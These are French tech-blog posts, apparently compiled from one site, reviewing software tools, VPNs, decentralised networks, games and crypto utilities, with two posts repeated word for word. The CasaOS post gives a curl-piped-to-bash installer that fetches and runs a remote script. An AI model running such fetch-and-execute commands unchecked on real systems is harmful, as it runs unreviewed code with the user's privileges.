Le premier de ces réseaux, c’est ScuttleButt. Contrairement à Twitter qui conserve tous les messages dans une base de données, ici le fonctionnement est différent. Les messages sont diffusés directement aux gens qui vous suivent en P2P à l’aide du protocole Gossip.

Pour vous connecter au réseau et commencer à poster vos premiers messages, vous aurez besoin d’un client comme Patchwork dispo sous macOS, Linux et Windows. Il existe d’autres clients, y compris sous la forme d’applications mobiles ou d’extension Firefox.

Par défaut, Patchwork vous permet uniquement de communiquer avec des gens qui se trouvent dans le même réseau local que vous. Pas besoin d’Internet donc.

Pour commencer à échanger avec le monde entier via Internet, il faudra rejoindre des « pubs » qui sont en fait des bots utilisateurs dont le rôle est de faciliter la diffuser des messages de tout le monde.

Pour me rajouter, voici ma clé publique :

@3zuV3vIWt1DGQiNPsR8Z/nzWA7RsSoQV9CFZQfSZTA4=.ed25519

Nostr

L’autre système s’appelle Nostr. Il s’agit d’un logiciel qui se compose de clients et de relais utilisant un protocole ouvert et chiffré pour communiquer tout en étant incensurable.

En effet, comme pour ScuttleButt, vous n’aurez pas de login / password pour vous authentifier, mais une clé de chiffrement (publique / privée) à conserver. Si vous la perdez, vous perdez votre compte.

Il y a différents clients téléchargeables, mais le plus utilisé s’appelle Branle et vous y accéder ici via le web ou le déployer chez vous en suivant cette procédure d’install.

À chaque fois que vous envoyez un message, celui-ci est chiffré avec la clé et envoyé à plusieurs relais. Les utilisateurs du réseau reçoivent alors l’information en provenance des relais. Les relais ne communiquent pas entre eux et tout le monde peut faire tourner son propre relai. C’est donc un système totalement résilient et incensurable. Il n’y a même pas besoin d’avoir confiance dans les relais puisque ce sont les signatures des messages vérifiées côté client qui font foi.

Et voici ma clé :

13d25add6b7e672a61bfd453a6333fc6d05a0fe9533bc559e7db759875e42f26

Je doute que ces outils prennent le pas sur Twitter un jour, mais on ne sait jamais… Peut-être qu’à un moment, le grand public voudra être anonyme et non censurable. Allez savoir…

Inspiré du projet In-Home-Switching et SkyNX, ce projet dispo sur Github va vous permettre de jouer à des jeux PC à partir de votre Nintendo Switch.

Alors non, vous n’allez pas installer le jeu sur la Switch. Il s’agit là plutôt de « remote gaming », c’est-à-dire de jeu à distance avec une application Streamer / Client qui s’installe à la fois sur le PC et à la fois sur la console (crackée évidemment).

Le logiciel qui va vous permettre de jouer sur votre PC au travers de la Nintendo Switch s’appelle Switch Remote Play. Cela streame la vidéo, l’audio, connecte automatiquement le PC et la Switch, se reconnecte également si besoin et le jeu reste dispo même après une sortie de veille de la console.

L’application Serveur est dispo pour Windows, mais il y a également un portage pour Mac pour les courageux qui savent compiler des projets macOS.

Perso, je n’ai pas connu d’ordinateur MSX, le standard japonais sorti en 1983 et qu’ont adopté à l’époque Sony, Panasonic, Samsung, Toshiba ou encore Casio…etc. pour leurs machines 8 bits.

L’idée c’était de rendre les ordinateurs et consoles compatibles entre eux. Microsoft a donc mis au point MSX qui avec MSX-DOS et MSX-Basic permettait alors de faire tourner des jeux et des applications sur différentes machines avec les mêmes graphismes, son…etc.

Le système utilisait des cartouches mémoires et des cassettes pour charger et sauvegarder des programmes.

Évidemment, le système a disparu depuis, mais Konamito a mis en ligne en 2004 un super site qui va vous permettre de revivre les heures de gloire de ces machines : MSX Games World !

Sur ce site, vous trouverez une archive de tous les jeux et logiciels sortis sur MSX, y compris les roms en téléchargement et un émulateur nommé WebMSX intégré dans les pages, qui vous permettra de jouer directement dans votre navigateur. Il y a sur le site plus de 5600 jeux référencés, donc de quoi vous amuser.

Tous les jeux ne fonctionnent pas forcément, mais cela vous permettra de retrouver les sensations d’avant, lorsque vous étiez ado pour les plus anciens. Ou tout simplement découvrir de nouveaux jeux pour les petits nouveaux.

Et dans le même style, il y a également le site msx.org qui vaut le détour.

Hier, je vous présentais Nebula le réseau privé virtuel mis au point par Slack. Mais si vous préférez la référence WireGuard dont j’ai parlé à maintes reprises sur ce site, vous devez absolument jeter un œil à Netmaker.

Netmaker est une plateforme qui permet de créer et gérer des réseaux privés virtuels (VPN) utilisant WireGuard.

Si vous avez 2 machines avec un accès Internet ou des milliers de serveurs répartis dans plusieurs datacenters et que vous voulez connecter tout cela avec un tunnel sécurisé, Netmaker peut vous aider…

Comme Tailscale, Nebula ou ces outils dont j’ai déjà parlé, Netmaker permet de créer un réseau en mesh pour fournir un accès réseau sécurisé à tous vos appareils ou simplement sécuriser des connexions entre plusieurs sites. Netmaker est rapide, car il utilise le noyau WireGuard et les serveurs comme les agents sont entièrement configurables, ce qui vous permet de gérer toutes sortes de cas d’utilisation différents.

La documentation est ici.

Nebula est un logiciel qui vous permet de connecter de manière transparente et sécurisée des ordinateurs partout dans le monde. C’est un logiciel portable qui fonctionne sous Linux, OSX, Windows, Android et iOS et qui permet facilement de mettre en place un réseau privé virtuel totalement peer to peer. Nebula sait gérer le trafic TCP/UDP/ICMP via un adaptateur TUN permettant de faire du split tunneling.

L’objectif de Nebula, est donc de permettre d’établir des connexions chiffrées entre les hôtes, de manière totalement agnostique en termes de serveur et capable de filtrer le trafic en fonction de l’identité de l’hôte qui souhaite le rejoindre (les hôtes doivent s’identifier à l’aide de certificats).

Ainsi chacun est libre de déployer son réseau Nebula pour disposer d’un réseau privé sécurisé et rapide.

On peut d’ailleurs remercier Slack qui est derrière ce projet et qui l’a libéré. En effet, Nebula fonctionne depuis plus de 2 ans sur tous les serveurs de Slack. Autant dire qu’il a été bien testé.

Nebula est téléchargeable ici pour Linux, BSD, macOS (Darwin) ou encore Windows (AMD64).

Si vous êtes abonné à Spotify, mais que l’interface vous gonfle, j’ai exactement ce qu’il vous faut. Il s’agit d’un client Spotify écrit en Rust et utilisant la librairie ncurses pour être entièrement utilisable dans votre terminal macOS, Windows ou Linux.

L’interface est parfaitement claire et très simple à utiliser à l’aide des touches de votre clavier. Mais il y a également tout un tas de raccourcis clavier qui vous permettront de faire des recherches, de gérer la lecture, d’ajouter des chansons à des playlists…etc.

Évidemment, vous aurez besoin d’un compte payant Spotify pour l’utiliser.

Je vous invite à aller voir tout cela sur la page Github du projet.

Pour l’installer sous macOS :

brew install ncspot

Pour l’installer sous Windows (il vous faudra scoop) :

scoop install ncspot

Et sous Linux (Debian compatible), la doc est sur la page github.

La définition de « cloud » a vraiment évolué ces dernières années. On est passé de :

« Je vais mettre tous mes fichiers dans le cloud de Google et d’Amazon »

à :

« Je me suis monté un serveur de cloud personnel »

Cela n’a plus aucun sens, mais on va faire comme si de rien n’était. Partons du principe que dans la tête des gens, aujourd’hui, cloud ça veut dire stockage personnel ou quelque chose comme ça.

Bref, si je vous dis tout ça c’est surtout pour vous présenter CasaOS, un logiciel open source qui vous propose de créer votre cloud à la maison. Oui, lol. N’empêche l’outil est cool puisqu’il vous permet grâce à Docker de déployer et gérer facilement tous vos usages personnels.

Ainsi, vous pouvez remplacer Dropbox, eBay, Google Drive ou encore Netflix par Syncthing, Bazaar, Nextcloud ou encore Plex très facilement, sans avoir à taper une seule ligne de commande. Vous l’aurez compris, l’idée c’est justement de vous passer du cloud pour héberger à nouveau votre contenu chez vous à l’aide d’applications qui ont fait leurs preuves (j’en ai présenté la plupart sur ce site d’ailleurs).

Avec CasaOS, vous pourrez gérer toutes vos données et vos usages depuis votre ordinateur ou votre smartphone et à terme, l’outil encore un peu jeune, vous permettra également de gérer vos scénarios domotique, de stocker les vidéos de vos caméras de surveillance ou de récupérer les infos d’un tas de matériel IoT.

CasaOS fonctionne sous Linux, mais a surtout été testé sous Ubuntu, mais également Raspberry Pi OS Bullseye, ce qui est une bonne nouvelle si vous avez un Raspberry Pi.

Pour l’installer, il suffit d’entrer la commande suivante dans votre terminal :

curl -fsSL https://get.icewhale.io/casaos.sh | bash

Si cela vous intéresse, une démo est disponible ici (mot de passe: casaos)

— En partenariat avec talent.io —

Le site d’emploi talent.io a analysé plus de 100 000 offres d’emplois pour déterminer 2 choses :

• A quel salaire peut prétendre tel ou tel profil Tech ?
• Quel salaire un recruteur doit proposer pour être compétitif ?

Oui, car ce n’est pas simple en tant que candidat de savoir se situer sur une grille de salaire en fonction de son expérience et de sa localisation. Cette étude vous aidera également à vous décider si vous envisagez de changer de ville voire de pays en Europe.

Vous le savez également, recruter des profils Tech c’est compliqué depuis quelques années. En tant que société, il faut savoir se démarquer et le salaire est évidemment un des points centraux pour la prise de décision des candidats.

Dans ce rapport de plus de 60 pages que vous pouvez télécharger ici après avoir complété un court formulaire, on découvre en premier lieu les salaires médians des développeurs en Europe, ville par ville en fonction de l’année d’expérience.

Pour vous montrer que ce n’est pas une étude pénible à lire, mais que c’est plus une suite de slides vraiment jolies et agréables à consulter, voici en exclusivité un petit extrait :

Les technologies backend / frontend les plus demandées en Belgique, Allemagne, France, Pays-Bas et Royaume-Uni sont également analysées. En France par exemple, on ne recrute pas forcément sur les mêmes technos backend qu’en Belgique.

On découvre ensuite les métiers du développement les plus recherchés en France et la répartition des salaires sur la France en fonction des années d’expérience. Évidemment, comme la plupart des emplois sont concentrés dans le bassin parisien, il y a également un focus de quelques pages sur les métiers Tech à Paris : la demande, les salaires dans différentes branches du métier (data, produit, management, devops). Vous y découvrirez aussi quel métier offre le meilleur salaire en début de carrière ou quel métier offre les meilleures perspectives salariales sur le long terme.

Allez, encore un petit aperçu en cadeau.

Viennent ensuite les salaires des métiers du développement en Allemagne, Londres, Amsterdam et Bruxelles et un passage sur les taux journaliers des freelances dans la Tech.

Et à la fin du document, vous aurez des données sur le télétravail dans la Tech, les tendances et les salaires du télétravail.

Ce rapport de talent.io est vraiment une analyse très complète de l’offre en Europe des jobs proposés aux développeurs en Europe. En tant que recruteur ou recruteuse, elle vous aidera à prendre les bonnes décisions pour proposer un salaire juste ou plus élevé que la moyenne. Et en tant que candidat développeur, elle vous aidera à orienter votre choix de carrière, à déterminer le salaire auquel prétendre en fonction de votre niveau d’XP et pourquoi pas envisager un déménagement dans une autre ville Européenne telle que Bruxelles ou Munich, voire passer totalement en Freelance…. qui sait ?

Si vous voulez découvrir tout ça, je vous invite à télécharger ce rapport ici.

Développé initialement par les chercheurs de l’INRIA et aujourd’hui maintenu par sa communauté, Natron est ce qu’on appelle un Digital Compositor. C’est-à-dire un outil capable d’assembler différentes images pour réaliser un rendu final sous la forme d’une image ou d’une vidéo 2D / 2,5D (pseudo-3D). C’est l’équivalent d’Adobe After Effects en open source si vous préférez.

L’outil est totalement open source et offre différentes possibilités comme du rotoscoping, du tracking 2D, du keying et j’en passe. Pour ne rien vous cacher, je ne suis pas très familier avec ce genre d’outils, mais de ce que je peux voir sur la démo ci-dessous, c’est qu’il a l’air quand même de faire pas mal de choses cool.

Donc si vous vous intéressez à l’animation ou à la composition numérique, je trouve que Natron peut vous offrir pas mal de possibilités, le tout gratuitement sans avoir à investir dans une licence Adobe.

Le rendu de votre travail peut ensuite utiliser le GPU de votre ordinateur, voire carrément un réseau de machines pour accélérer la production et il est possible de lui ajouter des tas de plugins (ou d’en développer vous-même).

Natron est à découvrir ici pour Linux, macOS, FreeBSD et Windows.

Que vous soyez DevOps ou comme moi, informaticien du dimanche, vous avez forcement besoin de cet outil. WindTerm est un terminal qui est utilisable localement, mais vous permettra également de vous connecter en SSH, SFTP, Telnet ou encore via le port Série d’une machine type modem ou autre.

Totalement gratuit, mais seulement à moitié open source, ce logiciel vous permet de gérer toutes vos sessions, de les sauvegarder, mais également de séparer l’écran en plusieurs terminaux, ce qui est vachement pratique.

Il gère également le déport X11, permet un thème clair / sombre et dispose d’excellentes performances.

WindTerm est dispo sous Linux, macOS et Windows pour le plus grand bonheur de tous !

Ah et la documentation est ici.

— Article rédigé par l’ami Remouk (DansTonChat) – Merci à lui —

Si vous suivez un peu l’actualité du jeu vidéo, vous avez sûrement entendu parler de ce nouveau volume des aventures de nos monstres de poches préférés, j’ai nommé les Furby les Pokémon bien sûr !

En effet, non content de promettre une révolution rafraîchissante à la formule habituelle, le titre rencontre un certain succès en se vendant à 6,5 millions d’exemplaires en 7 jours seulement (le second meilleur lancement de toute la saga).

Succès mérité ? Si le jeu n’est pas dénué de défaut, j’ai envie de dire oui et de vous expliquer pourquoi :

Tout d’abord, parce que la promesse d’une aventure plus libre, où l’exploration prime, est tenue. Alors soyons clairs dès le début, les graphismes ne sont pas dignes des capacités de la Switch… 🙁 C’est vraiment LE point noir. Mais ça n’empêche pas de se prendre au jeu.

Habituellement, on se balade de ville en ville pour affronter des champions de plus en plus puissants. Ici, l’histoire se recentre sur le remplissage du Pokédex, donc la chasse et l’observation des Pokémon, rien d’autre ! Ça peut décevoir mais les missions sont suffisamment nombreuses et variées pour nous tenir en haleine de nombreuses heures.

Je ne vais pas vous détailler tous les apports et différences de ce jeu, surtout que le looooooong tutorial se fera un plaisir de tout expliquer parfaitement, mais on peut saluer les efforts fournis par Game Freak pour secouer un peu la licence et ne pas rendre l’expérience monotone. Selon moi c’est réussi !

Par exemple le passage en mode « combat » est super bien intégré : on n’a plus l’impression d’être coupé dans notre élan. Et d’ailleurs, les bastons sont enrichies grâce aux styles rapides / puissants, mais aussi moins nombreuses puisqu’on peut désormais capturer des Pokémon sans les tabasser. Déjà c’est plus sympa pour eux, les pauvres… Mais aussi ça rend les sessions plus fluides et agréables.

Il y a pas mal de choses qui rendent la vie plus facile. Les bivouacs dans lesquels on peut se téléporter pour se reposer, etc., le crafting, simple et efficace, qui permet de s’équiper sans se ruiner, les différentes montures, super cools à utiliser… 🙂 Ce que je retiens de ces nouveaux éléments, c’est que peu de choses sont frustrantes !

En fait, ça ressemble pas mal à l’idée qu’on pouvait se faire de Pokémon, à l’époque, avant d’y jouer : on explore des milieux naturels à la recherche de certaines espèces, on les observe, on expérimente jusqu’à trouver la bonne approche pour les capturer, on combat les dangers grâce à nos Pokémon préférés avec lesquels on se lie d’amitié pour la vie entière… 🤗 Bon OK je suis trop sentimental. Mais parfois ça fait du bien.

Acheter Légendes Pokémon : Arceus sur Switch

Sachez que cette aventure aura fait vibrer mon âme d’aventurier, et pour la peine, la prochaine fois je vous parle d’un jeu d’exploration pure ! 🙂

Voici une extension pour Chrome et ses dérivés qui va vous plaire si vous voulez automatiser certaines tâches. Cette extension c’est Automata qui permet simplement en connectant des blocs ensemble de remplir des formulaires, réaliser certaines tâches répétitives, prendre une capture écran, scraper de la donnée sur des sites…etc.

C’est hyper visuel et très simple à prendre en main et parce qu’une bonne vidéo vaut mieux qu’un long dessin, voici une démo :

Chaque action peut être déclenchée manuellement, à une date / heure spécifique, avec un raccourci clavier ou simplement lors de la visite d’un site. À partir de là, vous pourrez effectuer des actions, injecter vos propres données à partir d’un JSON ou CSV, mais également parcourir et récupérer de la data à partir des pages visées.

Super pratique !

Automata est téléchargeable ici.

Je suis assez tête en l’air, je dois bien l’avouer. Et malheureusement, ça me joue encore des tours. Alors pour tout ce qui est planning éditorial, rendez-vous et autres événements importants, j’utilise le calendrier de mon mac / iPhone. C’est synchronisé et ça fonctionne bien.

Mais je ne suis pas un grand fan de l’application Calendar d’Apple et je ne pense pas forcément à la regarder. Heureusement, grâce à Laurent que je remercie, j’ai découvert Itsycal.

Il s’agit d’une application compagnon qui se loge dans la barre de menus de macOS et qui se connecte à votre calendrier. Cela vous permet à la fois d’afficher les événements futurs, mais également d’en rajouter ci besoin.

Itsycal en plus de son joli sourire propose un mode sombre, la possibilité d’afficher les numéros de semaine et même de mettre la date dans la barre de menu.

Bref, vous l’aurez compris, c’est super pratique pour garder le lien avec son calendrier et ne plus rien oublier.

À télécharger ici.

Si vous êtes plus littéraire que matheux mais que vous devez quand même faire quelques petits calculs de budget, des factures ou ce genre de choses désagréable, foncez vite sur le site Numbr.dev.

Sur ce site, une simple page blanche qui vous permettra de mêler le texte aux mathématiques. Numbr prendra en compte tous les chiffres, les calculs, les conversions, les formules mathématiques et même du JavaScript.

Dans la colonne de droite, vous trouverez alors le résultat de vos calculs et formules et vous pourrez reprendre ces variables ensuite dans votre texte pour en faire d’autres choses comme le convertir dans une autre unité de mesure ou calculer un pourcentage.

On peut bien sûr rédiger tout cela sous la forme d’un texte, ce qui donnerait ceci :

Je vous avoue que c’est hyper agréable à utiliser et ça permet de mettre à plat des raisonnements chiffrés en les expliquant avec du texte. Et pourquoi pas s’en servir pour faire quelques factures.

La seule limite c’est votre imagination !

Évidemment, tout ce que vous écrivez est ensuite sauvegardable et partageable avec une simple URL.

Si Numbr vous intéresse, c’est par ici. Et je vous conseille de lire la courte documentation pour voir toutes les possibilités de l’outil.

Si vous suivez un peu l’actualité, cela ne vous aura pas échappé : Twitter propose depuis peu à certaines personnes la possibilité d’afficher un NFT sous la forme d’une image de profil.

Un NFT, ça ne veut pas dire « Non Functioning Testicle » mais Non Fongible Token. C’est tout simplement un contenu (image, musique, document, vidéo…etc) dont l’acte de propriété est enregistré et authentifié dans une blockchain. Je vous ai déjà tout expliqué à ce sujet ici.

Il y a beaucoup de haine anti-NFTs en ce moment, d’abord parce que c’est à la mode (et les gens adorent suivre la mode) mais aussi parce que ce n’est pas quelque chose de très utile, que c’est sujet à spéculation et que ça consomme un peu d’énergie. Alors forcément, ça cristallise la haine de certaines personnes qui mettent sur le dos de cette technologie le dérèglement climatique, les méfaits du capitalisme, la disparition des abeilles, le passeport sanitaire, les chocolatines, leur misère sentimentale et la petite goutte de pipi qui traine dans leur slip.

C’est vrai, le NFT sous sa forme actuelle n’est pas encore à son plein potentiel, et comme l’ont été la radio, la télévision, Internet, le smartphone, les vaccins, les cryptomonnaies…etc à leurs débuts, il y a évidemment des gens qui condamnent cette technologie pour X raisons diaboliques.

C’est leur droit.

Malgré la vindicte populaire, certains fous osent courageusement afficher leur NFTs sur leur profil Twitter en utilisant cette fonctionnalité.

Mais alors comment distinguer un profil NFT d’un profil Twitter classique ?

Simple : L’avatar est dans un espèce de losange aux coins arrondis.

Seulement voilà, tout le monde n’a pas de NFTs ou pas forcément l’option active sur Twitter, permettant d’associer un NFT avec son profil.

Heureusement, il existe un moyen de tricher. Et ce moyen, on le doit à Mathis Hammel qui a développé un petit service permet à partir de votre nom d’utilisateur Twitter, de récupérer votre avatar dans un format identique à celui des possesseurs de NFTs.

Je sais, c’est de la triche mais c’est trop rigolo. Pour cela, il suffit d’appeler l’url suivante en remplaçant le pseudo (ici Korben) par votre pseudo Twitter :

http://mathis.h25.io/nft/Korben

Par contre, sachez qu’en utilisant ce service, certains fous de la gare vous traiteront comme une raclure de bidet sans même chercher une seconde à savoir si c’est un trucage ou si vraiment vous être une sale ordure pro-NFT-destructeur-des-mondes. Vous allez faire le plein de points Godwin en un rien de temps.

Cela dit, ça peut être une expérience sociale intéressante alors préparez-vous !

Merci Mathis !

Hello, je ne vais pas revenir en détails sur le fonctionnement du DNS over HTTPS puisque j’ai déjà mis en ligne 2 merveilleux articles sur le sujet :

• Comment activer le DNS-over-HTTPS (DoH) sous Firefox et Chrome / Brave
• La liste des fournisseurs (sérieux) de DNS compatibles DNS-over-HTTPS (DoH)

Mais pour résumer, il s’agit simplement de chiffrer vos requêtes DNS pour plus de confidentialité.

Dans le cadre de mon Patreon, j’ai mis en ligne il y a quelques semaines une vidéo qui explique comment activer le DNS over HTTPS (DoH) directement sous Windows 11. Aujourd’hui, est venu le moment de la rendre publique.

C’est super simple et je vous recommande vivement de le faire.

Voici donc le tuto en vidéo. Et si vous souhaitez recevoir chaque jour un article tech dans votre boite mail et accéder en exclu à mes vidéos, je vous invite à rejoindre mon Patreon.

Si vous suivez un peu l’actualité, cela ne vous aura pas échappé : Twitter propose depuis peu à certaines personnes la possibilité d’afficher un NFT sous la forme d’une image de profil.

Un NFT, ça ne veut pas dire « Non Functioning Testicle » mais Non Fongible Token. C’est tout simplement un contenu (image, musique, document, vidéo…etc) dont l’acte de propriété est enregistré et authentifié dans une blockchain. Je vous ai déjà tout expliqué à ce sujet ici.

Il y a beaucoup de haine anti-NFTs en ce moment, d’abord parce que c’est à la mode (et les gens adorent suivre la mode) mais aussi parce que ce n’est pas quelque chose de très utile, que c’est sujet à spéculation et que ça consomme un peu d’énergie. Alors forcément, ça cristallise la haine de certaines personnes qui mettent sur le dos de cette technologie le dérèglement climatique, les méfaits du capitalisme, la disparition des abeilles, le passeport sanitaire, les chocolatines, leur misère sentimentale et la petite goutte de pipi qui traine dans leur slip.

C’est vrai, le NFT sous sa forme actuelle n’est pas encore à son plein potentiel, et comme l’ont été la radio, la télévision, Internet, le smartphone, les vaccins, les cryptomonnaies…etc à leurs débuts, il y a évidemment des gens qui condamnent cette technologie pour X raisons diaboliques.

C’est leur droit.

Malgré la vindicte populaire, certains fous osent courageusement afficher leur NFTs sur leur profil Twitter en utilisant cette fonctionnalité.

Mais alors comment distinguer un profil NFT d’un profil Twitter classique ?

Simple : L’avatar est dans un espèce de losange aux coins arrondis.

Seulement voilà, tout le monde n’a pas de NFTs ou pas forcément l’option active sur Twitter, permettant d’associer un NFT avec son profil.

Heureusement, il existe un moyen de tricher. Et ce moyen, on le doit à Mathis Hammel qui a développé un petit service permet à partir de votre nom d’utilisateur Twitter, de récupérer votre avatar dans un format identique à celui des possesseurs de NFTs.

Je sais, c’est de la triche mais c’est trop rigolo. Pour cela, il suffit d’appeler l’url suivante en remplaçant le pseudo (ici Korben) par votre pseudo Twitter :

http://mathis.h25.io/nft/Korben

Par contre, sachez qu’en utilisant ce service, certains fous de la gare vous traiteront comme une raclure de bidet sans même chercher une seconde à savoir si c’est un trucage ou si vraiment vous être une sale ordure pro-NFT-destructeur-des-mondes. Vous allez faire le plein de points Godwin en un rien de temps.

Cela dit, ça peut être une expérience sociale intéressante alors préparez-vous !

Merci Mathis !

Hello, je ne vais pas revenir en détails sur le fonctionnement du DNS over HTTPS puisque j’ai déjà mis en ligne 2 merveilleux articles sur le sujet :

• Comment activer le DNS-over-HTTPS (DoH) sous Firefox et Chrome / Brave
• La liste des fournisseurs (sérieux) de DNS compatibles DNS-over-HTTPS (DoH)

Mais pour résumer, il s’agit simplement de chiffrer vos requêtes DNS pour plus de confidentialité.

Dans le cadre de mon Patreon, j’ai mis en ligne il y a quelques semaines une vidéo qui explique comment activer le DNS over HTTPS (DoH) directement sous Windows 11. Aujourd’hui, est venu le moment de la rendre publique.

C’est super simple et je vous recommande vivement de le faire.

Voici donc le tuto en vidéo. Et si vous souhaitez recevoir chaque jour un article tech dans votre boite mail et accéder en exclu à mes vidéos, je vous invite à rejoindre mon Patreon.

Si vous êtes sous macOS et que vous voulez positionner vos fenêtres correctement, avec des petits raccourcis clavier ou simplement en les glissant dans les bonnes zones, j’ai ce qu’il vous faut.

C’est un outil qui s’appelle Rectangle et qui permet de placer et redimensionner vos applications pour par exemple, en mettre 2 côte à côte, ou l’une en dessous de l’autre…etc. Cela peut se faire au clavier mais également simplement en déplacement la fenêtre à l’endroit voulu ou en utilisant le menu qui se loge dans la barre de menu.

Pas de prise de tête, les raccourcis sont très simples à retenir et vous verrez que ça va vous changer la vie.

Rectangle est un logiciel libre écrit en Swift donc les sources sont disponibles ici.

Bitcoin, vous connaissez forcement toutes et tous. Peut-être même avez-vous déjà une adresse.

Mais j’sais pas pour vous, mais moi, mon adresse c’est celle-ci :

1Korben1cqCccrVWA3sBsT9C9rknVu9nWa

J’sais pas si vous avez vu, mais y’a mon pseudo dedans 🙂

Ce que je vous propose aujourd’hui, c’est d’apprendre à générer un Wallet avec un petit texte personnalisé dedans. Cela n’a rien de nouveau, mais c’est rigolo à faire.

Pour cela, vous allez récupérer ce l’outil VanitySearch.exe pour Windows ou compiler ses sources pour Linux.

Ensuite, il suffit de lancer VanitySearch comme ceci avec les bons paramètres pour récupérer une adresse de portefeuille Bitcoin avec sa clé privée.

Le paramètre « -stop » indique au logiciel qu’il devra s’arrêter dès qu’il en aura trouvé une. Le « -gpu » indique au soft d’utiliser votre carte graphique pour avoir de meilleures performances. Enfin, le dernier paramètre c’est le début de l’adresse publique que vous voulez avoir.

Celle-ci peut commencer par 1, 3 ou bc1q. Pour la démo, j’ai décidé que mon adresse devrait commencer par 1Sexy. Choisissez quand même quelque chose de court, car plus ce sera long, plus ça mettra du temps… des années mêmes selon la puissance de votre machine.

VanitySearch.exe -stop -gpu 1Sexy

Au bout d’un moment plus ou moins long en fonction de ce que vous avez choisi, vous obtiendrez alors une adresse publique et une clé privée au format WIF et au format HEX. Pensez à bien conserver cette clé privée dans un endroit sûr, et à ne jamais la communiquer à personne.

Je vais ensuite vous expliquer comme utiliser cette clé en la restaurant dans un portefeuille Bitcoin comme Electrum.

Pour cela, téléchargez et lancez Electrum. Puis dans le menu Fichier, choisissez « Restaurer ».

Electrum vous proposera alors de créer un nouveau portefeuille. Choisissez l’option « Importez des adresses Bitcoin ou clés privées ».

Collez votre clé privée au format WIF (celle qui commence par « p2pkh: ») et voilà, vous aurez votre nouvelle adresse Bitcoin personnalisée !

Sympa non ?

Si vous faites de la randonnée, du VTT, du trail ou toute autre activité qui implique d’aller dehors dans la nature, vous récupérez sûrement vos parcours avec un GPS. Le format de fichier pour ce genre de parcours est le plus souvent le format GPX (et FIT).

Si vous avez ce genre de fichier en votre possession, et bien avec Rumbo, vous allez pouvoir réaliser des animations en vidéo très très cool.

Vous pouvez faire tout un tas de réglages comme choisir le fond de carte, l’inclinaison, l’orientation (nord, sud, est…etc) pour ensuite les partager avec votre communauté de passionné. Chouette non ?

Rumbo est à tester ici.

Si vous installez plein de logiciels sur votre Linux et que vous commencez à avoir du mal à tout suivre, j’ai une solution beaucoup plus sympa qu’un simple listing interminable dans le terminal.

Cette solution c’est Bauh (prononcez Ba-Ou) anciennement connu sous le nom fpakman qui n’est ni plus ni moins qu’une interface pour gérer vos applications Linux, que vous les ayez installés à l’aide d’AppImage, de Snap, Flatpak, ou encore des dépôts Arch Linux / AUR.

Pour chaque application détectée, vous pouvez la désinstaller, surveiller l’historique, stopper les mises à jour, voire downgrader celle-ci.

Et la surprise ?

Et bien vous pourrez avec Bauh, installer également des applications web. Il suffit d’entrer l’URL du site que vous voulez avoir sous la main d’un seul clic pour que celui-ci le détecte et vous propose de l’installer un peu comme une vraie application, avec une icône…etc.

Super idée non ?

Alors, si ça vous dit, pour installer Bauh sous Debian et ses dérivés, lancez un terminal et entrez la commande suivante :

sudo apt-get install python3 python3-pip python3-yaml python3-dateutil python3-pyqt5 python3-packaging python3-requests python3-lxml python3-bs4

Puis

sudo pip3 install bauh

Une fois que c’est installé, lancez l’application. Vous verrez alors les applications déjà en place sur votre système.

En cliquant sur la petite icône « ampoule » en bas à droite, vous verrez alors tous les paquets qu’il est possible d’installer.

Amusez-vous bien !

J’aime bien lire des articles sur le web, mais je n’ai pas toujours le temps lorsqu’ils sont vraiment longs. C’est dommage !

Puis le soir, j’ai plutôt tendance à sortir ma liseuse que le smartphone pour bouquiner. Alors, comment faire pour ne pas perdre tout ce merveilleux contenu ?

Et bien grâce au site TXT Paper, il est possible de convertir le contenu de n’importe quel page web en livre numérique dans le format de votre choix : PDF, epub, mobi, markdown ou texte simple.

Cela vous permettra ensuite de retravailler le contenu ou de le lire sur votre liseuse ou tout simplement en faire un ebook à publier sur Amazon.

À vous de voir !

Et pour les plus développeurs d’entre vous, sachez que TXT Paper est disponible sous la forme d’API.

Si vous avez une imprimante 3D, mais que vous ne vous êtes pas encore intéressé à la conception 3D, vous téléchargez sûrement des modèles sur tous ces sites que j’ai référencés pour vous.

Cool ! Mais si vous avez envie d’imprimer des lettres pour faire quelque chose de plus personnalisé, je vous invite à vous rendre sur ce convertisseur TEXTE -> STL.

Vous écrivez votre texte, vous sélectionnez ou importez une police qui vous plaît, vous réglez la taille et la largeur des caractères et hop, y’a plus qu’à télécharger le STL pour ensuite le mettre dans Cura (ou autre) et l’imprimer.

Pratique comme site non ?

Merci à Laurent pour la découverte !

Alors je vous le dis tout de suite, exceptionnellement je n’ai pas pu tester ce script, car mon Raspberry Pi 4 est déjà bien occupé. Mais je pense que ça va vous intéresser, donc je vous en parle quand même.

Sachez que si vous cherchez un moyen d’installer OBS Studio + FFMpeg sur le Raspberry Pi 4, il y a Xavier Belanche Alonso qui a mis a dispo sur son Github un script qui automatise la compilation et l’installation de ces 2 outils.

Il vous faudra la dernière version de Raspberry Pi OS alias Bullseye pour que ça fonctionne et une fois en place, cela vous permettra d’enregistrer des vidéos, voire de streamer sur Twitch ou YouTube avec une config vraiment minimale, voire de vous servir de ce Rpi 4 comme d’une passerelle de stream uniquement, ce qui vous permettra de libérer votre ordinateur de tous les jours.

Le script est à télécharger ici.

Je sais que vous aimez les réseaux neuronaux, alors aujourd’hui, je vous propose de vous amuser avec Vid2vid. Mis au point par des chercheurs de Nvidia, ce modèle neuronal de synthèse vidéo est capable de reproduire une « tête qui parle » à partir d’une simple photo. Très pratique pour les visios où une simple photo de profil pourrait devenir beaucoup plus vivante.

Pour illustrer leur techno, les chercheurs ont mis en ligne une démo qui vous permet à partir d’une photo de changer l’angle de rotation de la tête, mais également la position des yeux. Vous uploadez l’image, vous encadrez la tête, vous jouez avec les curseurs puis vous cliquez sur le bouton « Rotate » et vous obtiendrez une nouvelle image vraiment bluffante.

Par exemple, voici mon essai avec Edward Snowden. À gauche là photo d’origine, à droite Edward qui sonde votre âme.

Le rendu est pas mal vous ne trouvez pas ? Un petit bug avec les lunettes, mais à part ça, on s’y croirait.

Même si on touche uniquement au réglage de la position des yeux, on peut avoir un truc marrant.

À voir maintenant ce que ça donnera quand ce sera implémenté dans un soft qui fera de la vidéo et qu’on pourra tester. En attendant, voici ce que ça donne et tout ce qu’on pourra faire avec ce truc :

OWASP Zed Attack Proxy alias ZAP est un outil de scan qui permet de tester la sécurité de votre site. ZAP est un logiciel libre qui se comporte comme un proxy man in the middle. Il se place entre le navigateur du testeur et l’application web afin d’intercepter et d’inspecter les messages envoyés entre ces derniers. Il tente ensuite, si besoin, d’en modifier le contenu si nécessaire, pour enfin transmettre ces paquets à leur destination.

